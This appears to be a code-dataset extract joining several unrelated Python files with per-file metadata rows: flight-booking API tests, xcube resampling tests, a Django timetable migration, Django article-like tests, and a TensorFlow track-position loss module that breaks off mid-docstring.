'departure_time': '2014-12-22T03:12:58.019077+00:00',
'fare': 50000,
'max_capacity': 1,
'destination': 'Enugu',
'origin': 'Calabar'
})
flight.save()
flight_ticket = FlightTicket(
user=user,
flight=flight
)
flight_ticket.save()
response = client.get(
'/v1/flights/{0}/bookings?date={1}'.format(
str(flight.id),
datetime.datetime.today().strftime('%Y-%m-%d')
),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 200
assert response_body['status'] == 'success'
assert any(response_flight_ticket['id'] == str(flight_ticket.id) for response_flight_ticket in response_body['data']['flight_tickets'])
assert 'current_page' in response_body['data']['meta']
assert 'limit' in response_body['data']['meta']
assert 'total_items' in response_body['data']['meta']
assert 'no_of_pages' in response_body['data']['meta']
def test_it_should_return_flight_bookings_for_the_day_without_date_successfully(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
flight = Flight(**{
'estimated_arrival_time': '2014-12-22T03:12:58.019077+00:00',
'airline': 'Arik',
'departure_time': '2014-12-22T03:12:58.019077+00:00',
'fare': 50000,
'max_capacity': 1,
'destination': 'Enugu',
'origin': 'Calabar'
})
flight.save()
flight_ticket = FlightTicket(
user=user,
flight=flight
)
flight_ticket.save()
response = client.get(
'/v1/flights/{0}/bookings'.format(
str(flight.id),
),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 200
assert response_body['status'] == 'success'
assert any(response_flight_ticket['id'] == str(flight_ticket.id) for response_flight_ticket in response_body['data']['flight_tickets'])
assert 'current_page' in response_body['data']['meta']
assert 'limit' in response_body['data']['meta']
assert 'total_items' in response_body['data']['meta']
assert 'no_of_pages' in response_body['data']['meta']
def test_it_should_return_flight_bookings_successfully_if_pagination_params_are_invalid(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
flight = Flight(**{
'estimated_arrival_time': '2014-12-22T03:12:58.019077+00:00',
'airline': 'Arik',
'departure_time': '2014-12-22T03:12:58.019077+00:00',
'fare': 50000,
'max_capacity': 1,
'destination': 'Enugu',
'origin': 'Calabar'
})
flight.save()
flight_ticket = FlightTicket(
user=user,
flight=flight
)
flight_ticket.save()
response = client.get(
'/v1/flights/{0}/bookings?page='.format(
str(flight.id),
),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 200
assert response_body['status'] == 'success'
assert any(response_flight_ticket['id'] == str(flight_ticket.id) for response_flight_ticket in response_body['data']['flight_tickets'])
assert 'current_page' in response_body['data']['meta']
assert 'limit' in response_body['data']['meta']
assert 'total_items' in response_body['data']['meta']
assert 'no_of_pages' in response_body['data']['meta']
| 28.439689
| 139
| 0.606923
| 847
| 7,309
| 5.031877
| 0.145218
| 0.081652
| 0.049273
| 0.063351
| 0.905913
| 0.905913
| 0.879165
| 0.879165
| 0.869076
| 0.854294
| 0
| 0.05965
| 0.249966
| 7,309
| 256
| 140
| 28.550781
| 0.717804
| 0
| 0
| 0.773148
| 0
| 0
| 0.251608
| 0.075113
| 0
| 0
| 0
| 0
| 0.134259
| 1
| 0.032407
| false
| 0.037037
| 0.018519
| 0
| 0.050926
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3561aac2916e9c6cb2d8eb48039356aa17b752c9
| 8,454
|
py
|
Python
|
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
test/core/test_resample.py
|
SabineEmbacher/xcube
|
25863c713a27f1ecf6efb25ee0de8d322ab295bc
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
from test.sampledata import new_test_dataset
from xcube.core.chunk import chunk_dataset
from xcube.core.resample import resample_in_time
from xcube.core.schema import CubeSchema
class ResampleInTimeTest(unittest.TestCase):
def setUp(self) -> None:
num_times = 30
time = []
periods = ['1D', '1D', '3D', '4D', '2D']
t = pd.to_datetime('2017-07-01T10:30:15Z', utc=True)
for i in range(num_times):
time.append(t.isoformat())
t += pd.to_timedelta(periods[i % len(periods)])
temperature, precipitation = zip(*[(272 + 0.1 * i, 120 - 0.2 * i) for i in range(num_times)])
input_cube = new_test_dataset(time, temperature=temperature, precipitation=precipitation)
input_cube = chunk_dataset(input_cube, chunk_sizes=dict(time=1, lat=90, lon=180))
self.input_cube = input_cube
def test_resample_in_time_min_max(self):
resampled_cube = resample_in_time(self.input_cube, '2W', ['min', 'max'])
self.assertIsNot(resampled_cube, self.input_cube)
self.assertIn('time', resampled_cube)
self.assertIn('temperature_min', resampled_cube)
self.assertIn('temperature_max', resampled_cube)
self.assertIn('precipitation_min', resampled_cube)
self.assertIn('precipitation_max', resampled_cube)
self.assertEqual(('time',), resampled_cube.time.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_min.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_max.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_min.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_max.dims)
self.assertEqual((6,), resampled_cube.time.shape)
self.assertEqual((6, 180, 360), resampled_cube.temperature_min.shape)
self.assertEqual((6, 180, 360), resampled_cube.temperature_max.shape)
self.assertEqual((6, 180, 360), resampled_cube.precipitation_min.shape)
self.assertEqual((6, 180, 360), resampled_cube.precipitation_max.shape)
np.testing.assert_equal(resampled_cube.time.values,
np.array(
['2017-06-25T00:00:00Z', '2017-07-09T00:00:00Z',
'2017-07-23T00:00:00Z', '2017-08-06T00:00:00Z',
'2017-08-20T00:00:00Z', '2017-09-03T00:00:00Z'], dtype=np.datetime64))
np.testing.assert_allclose(resampled_cube.temperature_min.values[..., 0, 0],
np.array([272.0, 272.4, 273.0, 273.8, 274.4, 274.9]))
np.testing.assert_allclose(resampled_cube.temperature_max.values[..., 0, 0],
np.array([272.3, 272.9, 273.7, 274.3, 274.8, 274.9]))
np.testing.assert_allclose(resampled_cube.precipitation_min.values[..., 0, 0],
np.array([119.4, 118.2, 116.6, 115.4, 114.4, 114.2]))
np.testing.assert_allclose(resampled_cube.precipitation_max.values[..., 0, 0],
np.array([120.0, 119.2, 118.0, 116.4, 115.2, 114.2]))
schema = CubeSchema.new(resampled_cube)
self.assertEqual(3, schema.ndim)
self.assertEqual(('time', 'lat', 'lon'), schema.dims)
self.assertEqual((6, 180, 360), schema.shape)
self.assertEqual((1, 90, 180), schema.chunks)
def test_resample_in_time_p90_dask(self):
# "percentile_<p>" can currently only be used with numpy rather than chunked dask arrays:
# TypeError raised on Windows, ValueError on Linux
with self.assertRaises(Exception):
# noinspection PyUnusedLocal
resampled_cube = resample_in_time(self.input_cube, '2W', 'percentile_90')
# TODO (forman): the call to resample_in_time() takes forever,
# this is not xcube, but may be an issue in dask 0.14 or dask 2.8.
# def test_resample_in_time_p90_numpy(self):
# # "percentile_<p>" can currently only be used with numpy, so compute() first:
# input_cube = self.input_cube.compute()
# resampled_cube = resample_in_time(input_cube, '2W', 'percentile_90')
# self.assertIsNot(resampled_cube, self.input_cube)
# self.assertIn('time', resampled_cube)
# self.assertIn('temperature_p90', resampled_cube)
# self.assertIn('precipitation_p90', resampled_cube)
# self.assertEqual(('time',), resampled_cube.time.dims)
# self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_p90.dims)
# self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_p90.dims)
# self.assertEqual((6,), resampled_cube.time.shape)
# self.assertEqual((6, 180, 360), resampled_cube.temperature_p90.shape)
# self.assertEqual((6, 180, 360), resampled_cube.precipitation_p90.shape)
# np.testing.assert_equal(resampled_cube.time.values,
# np.array(
# ['2017-06-25T00:00:00Z', '2017-07-09T00:00:00Z',
# '2017-07-23T00:00:00Z', '2017-08-06T00:00:00Z',
# '2017-08-20T00:00:00Z', '2017-09-03T00:00:00Z'], dtype=np.datetime64))
# np.testing.assert_allclose(resampled_cube.temperature_p90.values[..., 0, 0],
# np.array([272.3, 272.9, 273.7, 274.3, 274.8, 274.9]))
# np.testing.assert_allclose(resampled_cube.precipitation_p90.values[..., 0, 0],
# np.array([120.0, 119.2, 118.0, 116.4, 115.2, 114.2]))
#
# schema = CubeSchema.new(resampled_cube)
# self.assertEqual(3, schema.ndim)
# self.assertEqual(('time', 'lat', 'lon'), schema.dims)
# self.assertEqual((6, 180, 360), schema.shape)
# self.assertEqual((1, 90, 180), schema.chunks)
def test_resample_in_time_with_time_chunk_size(self):
resampled_cube = resample_in_time(self.input_cube, '2D', ['min', 'max'], time_chunk_size=5)
schema = CubeSchema.new(resampled_cube)
self.assertEqual(3, schema.ndim)
self.assertEqual(('time', 'lat', 'lon'), schema.dims)
self.assertEqual((33, 180, 360), schema.shape)
self.assertEqual((5, 90, 180), schema.chunks)
def test_resample_f_all(self):
resampled_cube = resample_in_time(self.input_cube, 'all', ['min', 'max'])
self.assertIsNot(resampled_cube, self.input_cube)
self.assertIn('time', resampled_cube)
self.assertIn('temperature_min', resampled_cube)
self.assertIn('temperature_max', resampled_cube)
self.assertIn('precipitation_min', resampled_cube)
self.assertIn('precipitation_max', resampled_cube)
self.assertEqual(('time',), resampled_cube.time.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_min.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.temperature_max.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_min.dims)
self.assertEqual(('time', 'lat', 'lon'), resampled_cube.precipitation_max.dims)
self.assertEqual((1,), resampled_cube.time.shape)
self.assertEqual((1, 180, 360), resampled_cube.temperature_min.shape)
self.assertEqual((1, 180, 360), resampled_cube.temperature_max.shape)
self.assertEqual((1, 180, 360), resampled_cube.precipitation_min.shape)
self.assertEqual((1, 180, 360), resampled_cube.precipitation_max.shape)
np.testing.assert_allclose(resampled_cube.temperature_min.values[..., 0, 0],
np.array([272.0]))
np.testing.assert_allclose(resampled_cube.temperature_max.values[..., 0, 0],
np.array([274.9]))
np.testing.assert_allclose(resampled_cube.precipitation_min.values[..., 0, 0],
np.array([114.2]))
np.testing.assert_allclose(resampled_cube.precipitation_max.values[..., 0, 0],
np.array([120.0]))
schema = CubeSchema.new(resampled_cube)
self.assertEqual(3, schema.ndim)
self.assertEqual(('time', 'lat', 'lon'), schema.dims)
self.assertEqual((1, 180, 360), schema.shape)
| 57.510204
| 109
| 0.623137
| 1,053
| 8,454
| 4.825261
| 0.150047
| 0.161189
| 0.066916
| 0.060618
| 0.812832
| 0.78764
| 0.764023
| 0.757725
| 0.756938
| 0.63826
| 0
| 0.08457
| 0.234918
| 8,454
| 146
| 110
| 57.90411
| 0.700989
| 0.249468
| 0
| 0.40625
| 0
| 0
| 0.070376
| 0
| 0
| 0
| 0
| 0.006849
| 0.552083
| 1
| 0.052083
| false
| 0
| 0.072917
| 0
| 0.135417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea753f7e4e660d1b93502373271cc53e7971daa7
| 156
|
py
|
Python
|
pfhedge/stochastic/__init__.py
|
vishalbelsare/pfhedge
|
4d7ff173995e0795942bc6ec55f3fdc5bfb7a5f1
|
[
"MIT"
] | 81
|
2021-03-19T02:39:35.000Z
|
2022-03-29T07:59:50.000Z
|
pfhedge/stochastic/__init__.py
|
akira66/pfhedge
|
bc4ae304f9dc887b0e4d581f8ad42700a4eea9ad
|
[
"MIT"
] | 382
|
2021-05-04T16:08:38.000Z
|
2022-03-31T13:10:51.000Z
|
pfhedge/stochastic/__init__.py
|
akira66/pfhedge
|
bc4ae304f9dc887b0e4d581f8ad42700a4eea9ad
|
[
"MIT"
] | 32
|
2021-05-15T02:40:23.000Z
|
2022-03-27T10:08:11.000Z
|
from .brownian import generate_brownian
from .brownian import generate_geometric_brownian
from .cir import generate_cir
from .heston import generate_heston
| 31.2
| 49
| 0.871795
| 21
| 156
| 6.238095
| 0.333333
| 0.427481
| 0.274809
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 50
| 39
| 0.935714
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
ea9e385bdd78ac0eb3d44984569b7f88df6b7235
| 3,895
|
py
|
Python
|
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
backend/uclapi/timetable/migrations/0015_crsavailmodulesa_crsavailmodulesb_crscompmodulesa_crscompmodulesb.py
|
balping/uclapi
|
57cb77a58a2f8fc5bb523b459fa074380f4d8dcc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-06 01:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('timetable',
'0014_auto_20190302_0232_squashed_0019_auto_20190305_1729'),
]
operations = [
migrations.CreateModel(
name='CrsavailmodulesA',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('setid', models.TextField(max_length=10)),
('courseid', models.TextField(max_length=12)),
('crsyear', models.BigIntegerField(blank=True, null=True)),
('groupnum', models.BigIntegerField(blank=True, null=True)),
('deptid', models.TextField(max_length=10, blank=True, null=True)),
('moduleid', models.TextField(max_length=12)),
('instid', models.BigIntegerField(blank=True, null=True)),
('semid', models.BigIntegerField(blank=True, null=True)),
('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
('crsver', models.BigIntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='CrsavailmodulesB',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('setid', models.TextField(max_length=10)),
('courseid', models.TextField(max_length=12)),
('crsyear', models.BigIntegerField(blank=True, null=True)),
('groupnum', models.BigIntegerField(blank=True, null=True)),
('deptid', models.TextField(max_length=10, blank=True, null=True)),
('moduleid', models.TextField(max_length=12)),
('instid', models.BigIntegerField(blank=True, null=True)),
('semid', models.BigIntegerField(blank=True, null=True)),
('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
('crsver', models.BigIntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='CrscompmodulesA',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('setid', models.TextField(max_length=10)),
('courseid', models.TextField(max_length=12)),
('crsyear', models.BigIntegerField(blank=True, null=True)),
('deptid', models.TextField(max_length=10, blank=True, null=True)),
('moduleid', models.TextField(max_length=12)),
('instid', models.BigIntegerField(blank=True, null=True)),
('semid', models.BigIntegerField(blank=True, null=True)),
('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
('crsver', models.BigIntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='CrscompmodulesB',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('setid', models.TextField(max_length=10)),
('courseid', models.TextField(max_length=12)),
('crsyear', models.BigIntegerField(blank=True, null=True)),
('deptid', models.TextField(max_length=10, blank=True, null=True)),
('moduleid', models.TextField(max_length=12)),
('instid', models.BigIntegerField(blank=True, null=True)),
('semid', models.BigIntegerField(blank=True, null=True)),
('unitvalue', models.TextField(max_length=19, null=True, blank=True)),
('crsver', models.BigIntegerField(blank=True, null=True)),
],
),
]
| 49.303797
| 86
| 0.570475
| 372
| 3,895
| 5.873656
| 0.185484
| 0.107094
| 0.130892
| 0.171167
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0.858124
| 0
| 0.032131
| 0.280873
| 3,895
| 78
| 87
| 49.935897
| 0.747947
| 0.017715
| 0
| 0.816901
| 1
| 0
| 0.102276
| 0.014648
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028169
| 0
| 0.070423
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
57dee393fc1cb5463a9c4d2f6ebb1f0995523541
| 7,154
|
py
|
Python
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 2
|
2018-08-17T15:47:36.000Z
|
2018-09-13T13:58:34.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 35
|
2018-07-24T11:42:53.000Z
|
2021-06-10T20:34:41.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/ah-backend-spaces-
|
58e031a96a6b9555f1a4133cf8cb688c236d3f3b
|
[
"BSD-3-Clause"
] | 3
|
2018-07-17T13:05:35.000Z
|
2018-09-06T16:03:52.000Z
|
from .base import BaseTest, json
class LikeArticleTest(BaseTest):
def test_getting_articles(self):
""" test a user can get all likes """
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.get(
"/api/articles/1/likes/", **auth_headers, content_type='application/json')
self.assertEqual(response.status_code, 405)
self.assertEqual(
response.json()['article']['error'], "method GET not allowed")
def test_liking_articles(self):
""" test a user can like an article"""
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_like_un_known_article(self):
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.post(
"/api/articles/1000/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_like_article_twice(self):
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
# like article 1 the first time
self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
# like article 1 the second time
response = self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_like_article_with_null(self):
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.null_article_to_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_can_update_like(self):
""" test a user can like an article with a dislike"""
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
response = self.test_client.put(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_can_update_like_on_un_liked_article(self):
""" test a user can like any article with a dislike"""
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.put(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_can_update_like_on_un_known_article(self):
""" test a user can like any article with a dislike"""
# log the user in to get auth token
auth_headers = self.user_logged_in
response = self.test_client.put(
"/api/articles/10000/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_can_delete_like(self):
""" test a user can delete an like on an article"""
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
self.test_client.post(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_like), content_type='application/json')
response = self.test_client.delete(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_can_delete_like_on_unliked_article(self):
""" test a user can delete an like on any article"""
# log the user in to get auth token
auth_headers = self.user_logged_in
# send a request to create an article
self.test_client.post(
"/api/articles/", **auth_headers,
data=json.dumps(self.article_to_create), content_type='application/json')
response = self.test_client.delete(
"/api/articles/1/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
def test_can_delete_like_on_un_known_article(self):
""" test a user can delete an like on an unknown article"""
# log the user in to get auth token
auth_headers = self.user_logged_in
response = self.test_client.delete(
"/api/articles/1000/likes/", **auth_headers,
data=json.dumps(self.article_to_dis_like), content_type='application/json')
self.assertEqual(response.status_code, 400)
| 37.067358
| 88
| 0.64775
| 945
| 7,154
| 4.679365
| 0.077249
| 0.084577
| 0.072818
| 0.135233
| 0.946404
| 0.946404
| 0.930122
| 0.922433
| 0.906151
| 0.892809
| 0
| 0.01093
| 0.245457
| 7,154
| 192
| 89
| 37.260417
| 0.808262
| 0.155018
| 0
| 0.809524
| 0
| 0
| 0.14159
| 0.053222
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.104762
| false
| 0
| 0.009524
| 0
| 0.12381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57ea01307112c075c0d03cecad8911ba88fd1fd6
| 11,159
|
py
|
Python
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 1
|
2021-05-06T10:00:51.000Z
|
2021-05-06T10:00:51.000Z
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 2
|
2021-12-07T15:23:57.000Z
|
2021-12-10T15:44:17.000Z
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 1
|
2022-02-07T16:20:10.000Z
|
2022-02-07T16:20:10.000Z
|
from __future__ import division, print_function
import tensorflow as tf
import numpy as np
from dnn_reco import misc
from dnn_reco.modules.loss.utils import loss_utils
"""
All defined models must have the following signature:
Parameters
----------
config : dict
Dictionary containing all settings as read in from config file.
data_handler : :obj: of class DataHandler
An instance of the DataHandler class. The object is used to obtain
meta data.
data_transformer : :obj: of class DataTransformer
An instance of the DataTransformer class. The object is used to
transform data.
shared_objects : dict
A dictionary containg settings and objects that are shared and passed
on to sub modules.
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
Returns
-------
tf.Tensor
A tensorflow tensor containing the loss for each label.
A weighted sum with weights as defined in the config will be performed
over these loss terms to obtain a scalar loss.
Shape: label_shape (same shape as labels)
"""
def track_pos_mse(config, data_handler, data_transformer, shared_objects,
*args, **kwargs):
"""The MSE of the 4-vector distance of the predicted vertex (x, y, z, t)
and the infinite track given by the true direction.
The label is set up such that all points on the infinite track are correct
predictions. This loss only applies to vertex (x, y, z, t) via the labels
'pos_x', 'pos_y', 'pos_z', 'time as defined in the label_particle_keys.
Parameters
----------
config : dict
Dictionary containing all settings as read in from config file.
data_handler : :obj: of class DataHandler
An instance of the DataHandler class. The object is used to obtain
meta data.
data_transformer : :obj: of class DataTransformer
An instance of the DataTransformer class. The object is used to
transform data.
shared_objects : dict
A dictionary containg settings and objects that are shared and passed
on to sub modules.
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
Returns
-------
tf.Tensor
A tensorflow tensor containing the loss for each label.
Shape: label_shape (same shape as labels)
"""
index_dir_x = data_handler.get_label_index(config['label_dir_x_key'])
index_dir_y = data_handler.get_label_index(config['label_dir_y_key'])
index_dir_z = data_handler.get_label_index(config['label_dir_z_key'])
index_pos_x = data_handler.get_label_index(
config['label_particle_keys']['pos_x'])
index_pos_y = data_handler.get_label_index(
config['label_particle_keys']['pos_y'])
index_pos_z = data_handler.get_label_index(
config['label_particle_keys']['pos_z'])
index_time = data_handler.get_label_index(
config['label_particle_keys']['time'])
dir_x_true = shared_objects['y_true'][:, index_dir_x]
dir_y_true = shared_objects['y_true'][:, index_dir_y]
dir_z_true = shared_objects['y_true'][:, index_dir_z]
x_true = shared_objects['y_true'][:, index_pos_x]
y_true = shared_objects['y_true'][:, index_pos_y]
z_true = shared_objects['y_true'][:, index_pos_z]
time_true = shared_objects['y_true'][:, index_time]
x_pred = shared_objects['y_pred'][:, index_pos_x]
y_pred = shared_objects['y_pred'][:, index_pos_y]
z_pred = shared_objects['y_pred'][:, index_pos_z]
time_pred = shared_objects['y_pred'][:, index_time]
x_unc = shared_objects['y_unc'][:, index_pos_x]
y_unc = shared_objects['y_unc'][:, index_pos_y]
z_unc = shared_objects['y_unc'][:, index_pos_z]
time_unc = shared_objects['y_unc'][:, index_time]
# x: predicted point, p: true point on track, d: true unit direction vector
# calculate a = x - p
a1 = x_pred - x_true
a2 = y_pred - y_true
a3 = z_pred - z_true
# scalar product s = a*d, s is distance to closest point on infinite track
s = a1*dir_x_true + a2*dir_y_true + a3*dir_z_true
# caculate r = s*d -a = (p + s*d) - x
r1 = s*dir_x_true - a1
r2 = s*dir_y_true - a2
r3 = s*dir_z_true - a3
# calculate time diff [meter] at closest approach point on infinite track
c = 0.299792458 # in m /ns
rt = (time_true + (s / c) - time_pred) * c
unc_diff_x = tf.stop_gradient(r1) - x_unc
unc_diff_y = tf.stop_gradient(r2) - y_unc
unc_diff_z = tf.stop_gradient(r3) - z_unc
unc_diff_t = tf.stop_gradient(rt) - time_unc
if 'event_weights' in shared_objects:
weights = shared_objects['event_weights']
w_sum = tf.reduce_sum(input_tensor=weights, axis=0)
loss_x = tf.reduce_sum(input_tensor=(r1**2 + unc_diff_x**2) * weights, axis=0) / w_sum
loss_y = tf.reduce_sum(input_tensor=(r2**2 + unc_diff_y**2) * weights, axis=0) / w_sum
loss_z = tf.reduce_sum(input_tensor=(r3**2 + unc_diff_z**2) * weights, axis=0) / w_sum
loss_t = tf.reduce_sum(input_tensor=(rt**2 + unc_diff_t**2) * weights, axis=0) / w_sum
else:
loss_x = tf.reduce_mean(input_tensor=r1**2 + unc_diff_x**2, axis=0)
loss_y = tf.reduce_mean(input_tensor=r2**2 + unc_diff_y**2, axis=0)
loss_z = tf.reduce_mean(input_tensor=r3**2 + unc_diff_z**2, axis=0)
loss_t = tf.reduce_mean(input_tensor=rt**2 + unc_diff_t**2, axis=0)
zeros = tf.zeros_like(loss_x)
loss_all_list = []
for label in data_handler.label_names:
if label == config['label_particle_keys']['pos_x']:
loss_all_list.append(loss_x)
elif label == config['label_particle_keys']['pos_y']:
loss_all_list.append(loss_y)
elif label == config['label_particle_keys']['pos_z']:
loss_all_list.append(loss_z)
elif label == config['label_particle_keys']['time']:
loss_all_list.append(loss_t)
else:
loss_all_list.append(zeros)
loss_all = tf.stack(loss_all_list, axis=0)
loss_utils.add_logging_info(data_handler, shared_objects)
return loss_all
def track_pos_gaussian(config, data_handler, data_transformer, shared_objects,
*args, **kwargs):
"""The Gaussian Likelihood loss of the 4-vector distance of the predicted
vertex (x, y, z, t) and the infinite track given by the true direction.
The label is set up such that all points on the infinite track are correct
predictions. This loss only applies to vertex (x, y, z, t) via the labels
